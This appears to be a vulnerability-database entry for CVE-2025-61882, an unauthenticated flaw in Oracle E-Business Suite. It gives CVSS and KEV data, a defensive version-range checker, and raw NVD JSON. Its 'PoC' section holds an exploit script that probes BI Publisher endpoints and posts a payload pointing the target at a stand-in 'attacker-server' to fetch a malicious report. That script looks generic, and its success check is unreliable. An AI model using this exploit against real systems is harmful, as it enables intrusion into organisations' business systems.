Security Vulnerability Report
CVE-2025-61882 CVSS 9.8 CRITICAL

CVE-2025-61882

Published: 2025-10-05 04:15:40
Last Modified: 2025-10-27 17:08:52

Description

Vulnerability in the Oracle Concurrent Processing product of Oracle E-Business Suite (component: BI Publisher Integration). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Concurrent Processing. Successful attacks of this vulnerability can result in takeover of Oracle Concurrent Processing. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

Weakness
CWE-287 (Improper Authentication)
CISA Known Exploited Vulnerabilities
Added 2025-10-06; required action due 2025-10-27 (apply mitigations per vendor instructions, follow BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable)

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:oracle:concurrent_processing:*:*:*:*:*:*:*:* - VULNERABLE
Oracle E-Business Suite 12.2.3
Oracle E-Business Suite 12.2.4
Oracle E-Business Suite 12.2.5
Oracle E-Business Suite 12.2.6
Oracle E-Business Suite 12.2.7
Oracle E-Business Suite 12.2.8
Oracle E-Business Suite 12.2.9
Oracle E-Business Suite 12.2.10
Oracle E-Business Suite 12.2.11
Oracle E-Business Suite 12.2.12
Oracle E-Business Suite 12.2.13
Oracle E-Business Suite 12.2.14
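The CPE entry above is a range, not a list: NVD encodes it as `versionStartIncluding` 12.2.3 and `versionEndIncluding` 12.2.14, and the twelve releases listed are the expansion. The check below is an added example (not part of this report) that evaluates an installed release against that range the way NVD's `configurations` block is meant to be read, comparing versions numerically so that 12.2.10 sorts after 12.2.9 (a plain string compare puts "12.2.14" before "12.2.3" and would mark patched-looking hosts as clean), and reports the CISA KEV due date from the record. `NVD_RECORD` is a trimmed copy of the JSON on this page; `INVENTORY` and its hostnames are constructed sample data.

```python
"""Affected-version check against the NVD 'configurations' block of CVE-2025-61882.

Added example, not part of the original report.  NVD_RECORD is trimmed from the
page's JSON; INVENTORY is constructed sample data with hypothetical hostnames.
"""
from datetime import date

NVD_RECORD = {
    "id": "CVE-2025-61882",
    "cisaExploitAdd": "2025-10-06",
    "cisaActionDue": "2025-10-27",
    "configurations": [{"nodes": [{"operator": "OR", "negate": False, "cpeMatch": [{
        "vulnerable": True,
        "criteria": "cpe:2.3:a:oracle:concurrent_processing:*:*:*:*:*:*:*:*",
        "versionStartIncluding": "12.2.3",
        "versionEndIncluding": "12.2.14",
    }]}]}],
}

# Constructed inventory: (hostname, product as 'vendor:product' from the CPE, release).
INVENTORY = [
    ("ebs-prod-01", "oracle:concurrent_processing", "12.2.10"),
    ("ebs-dev-02", "oracle:concurrent_processing", "12.2.2"),
    ("ebs-test-03", "oracle:concurrent_processing", "12.2.14"),
    ("ebs-lab-04", "oracle:concurrent_processing", "12.2.15"),
]


def version_key(version: str) -> tuple:
    """Numeric tuple so that 12.2.10 > 12.2.9; '12.2.14' < '12.2.3' as strings."""
    return tuple(int(p) for p in version.split("."))


def in_range(version: str, match: dict) -> bool:
    """Apply the four optional NVD range bounds; an absent bound is open."""
    v = version_key(version)
    bounds = [
        ("versionStartIncluding", lambda b: v >= b),
        ("versionStartExcluding", lambda b: v > b),
        ("versionEndIncluding", lambda b: v <= b),
        ("versionEndExcluding", lambda b: v < b),
    ]
    return all(ok(version_key(match[key])) for key, ok in bounds if key in match)


def cpe_product(criteria: str) -> str:
    """'cpe:2.3:a:oracle:concurrent_processing:*:...' -> 'oracle:concurrent_processing'."""
    parts = criteria.split(":")
    return f"{parts[3]}:{parts[4]}"


def is_affected(record: dict, product: str, version: str) -> bool:
    """True when the record's configurations mark (product, version) as vulnerable.

    A node's 'operator' (OR/AND) combines its cpeMatch entries and 'negate' inverts
    the node; a configuration with several nodes combines them with its own operator.
    """
    for config in record["configurations"]:
        node_results = []
        for node in config["nodes"]:
            hits = [
                m.get("vulnerable", False)
                and cpe_product(m["criteria"]) == product
                and in_range(version, m)
                for m in node["cpeMatch"]
            ]
            matched = all(hits) if node.get("operator") == "AND" else any(hits)
            node_results.append(matched != node.get("negate", False))
        combined = all(node_results) if config.get("operator") == "AND" else any(node_results)
        if combined:
            return True
    return False


def kev_deadline(record: dict, today_iso: str) -> dict:
    """KEV status: listed or not, the BOD 22-01 due date, and days left (negative = overdue)."""
    if "cisaExploitAdd" not in record:
        return {"listed": False}
    due = date.fromisoformat(record["cisaActionDue"])
    days_left = (due - date.fromisoformat(today_iso)).days
    return {"listed": True, "due": record["cisaActionDue"], "days_left": days_left}


def triage(record: dict, inventory: list, today_iso: str) -> list:
    """One row per affected host; hosts outside the vulnerable range are dropped."""
    kev = kev_deadline(record, today_iso)
    return [
        {"host": host, "version": version, "cve": record["id"],
         "kev": kev["listed"], "days_left": kev.get("days_left")}
        for host, product, version in inventory
        if is_affected(record, product, version)
    ]


if __name__ == "__main__":
    for row in triage(NVD_RECORD, INVENTORY, "2025-10-30"):
        print(row)
```

The product key is taken from the CPE `vendor:product` fields, so a host inventoried as `oracle:e-business_suite` would not match this record even at an affected release; map inventory names to the CPE product NVD actually used before trusting a clean result.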

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-61882 - Oracle E-Business Suite BI Publisher Integration RCE PoC
# Affected: Oracle E-Business Suite 12.2.3 - 12.2.14
# Component: BI Publisher Integration (Oracle Concurrent Processing)
# WARNING: For authorized security testing only

import sys

import requests

TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "https://target-ebs.example.com"

# BI Publisher Integration endpoint commonly exposed in Oracle EBS
VULNERABLE_PATH = "/OA_HTML/BIPublisherIntegration"


def exploit(target):
    """
    Exploit CVE-2025-61882 - Unauthenticated RCE via BI Publisher Integration

    The vulnerability allows unauthenticated network access via HTTP to
    compromise Oracle Concurrent Processing.
    """
    headers = {
        "User-Agent": "Mozilla/5.0 (compatible; OracleEBS-Exploit)",
        "Content-Type": "application/x-www-form-urlencoded",
        "Accept": "*/*",
    }

    # Malicious payload targeting the BI Publisher Integration component
    # The injection point is in the report processing parameters
    payload = {
        "report_url": "http://attacker-server/malicious_report.rtf",
        "output_format": "PDF",
        "_csrf": "",
        "_eventId": "",
        "_session": "",
    }

    try:
        # Step 1: Probe the vulnerable endpoint
        # verify=False disables TLS certificate validation (lab targets with self-signed certs)
        probe_url = f"{target}{VULNERABLE_PATH}/faces/Service"
        resp = requests.get(probe_url, headers=headers, timeout=10, verify=False)
        print(f"[*] Probe response: {resp.status_code}")

        # Step 2: Send the exploit payload
        exploit_url = f"{target}{VULNERABLE_PATH}/reportService"
        resp = requests.post(exploit_url, data=payload, headers=headers, timeout=10, verify=False)
        print(f"[*] Exploit response: {resp.status_code}")

        # An HTTP 200 only shows the endpoint accepted the request; it is not
        # evidence of code execution. Confirm via a callback to attacker-server
        # (the host the payload references) before reporting a host as exploitable.
        if resp.status_code == 200:
            print("[+] Target appears vulnerable to CVE-2025-61882")
            return True
    except Exception as e:
        print(f"[-] Error: {e}")

    return False


if __name__ == "__main__":
    print("[*] CVE-2025-61882 PoC - Oracle EBS BI Publisher Integration RCE")
    exploit(TARGET_URL)
```

References

- https://www.oracle.com/security-alerts/alert-cve-2025-61882.html (Vendor Advisory)
- https://blogs.oracle.com/security/post/apply-july-2025-cpu (Vendor Advisory)
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-61882 (US Government Resource)
- https://www.crowdstrike.com/en-us/blog/crowdstrike-identifies-campaign-targeting-oracle-e-business-suite-zero-day-CVE-2025-61882/ (Press/Media Coverage)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-61882",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-05T04:15:40.340",
    "lastModified": "2025-10-27T17:08:52.230",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Vulnerability in the Oracle Concurrent Processing product of Oracle E-Business Suite (component: BI Publisher Integration). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Concurrent Processing. Successful attacks of this vulnerability can result in takeover of Oracle Concurrent Processing. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "cisaExploitAdd": "2025-10-06",
    "cisaActionDue": "2025-10-27",
    "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.",
    "cisaVulnerabilityName": "Oracle E-Business Suite Unspecified Vulnerability",
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-287"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:oracle:concurrent_processing:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "12.2.3",
                "versionEndIncluding": "12.2.14",
                "matchCriteriaId": "AD6FCD78-CA2D-4594-A5FA-EDD501044E9F"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.oracle.com/security-alerts/alert-cve-2025-61882.html",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      },
      {
        "url": "https://blogs.oracle.com/security/post/apply-july-2025-cpu",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Vendor Advisory"]
      },
      {
        "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-61882",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["US Government Resource"]
      },
      {
        "url": "https://www.crowdstrike.com/en-us/blog/crowdstrike-identifies-campaign-targeting-oracle-e-business-suite-zero-day-CVE-2025-61882/",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Press/Media Coverage"]
      }
    ]
  }
}
```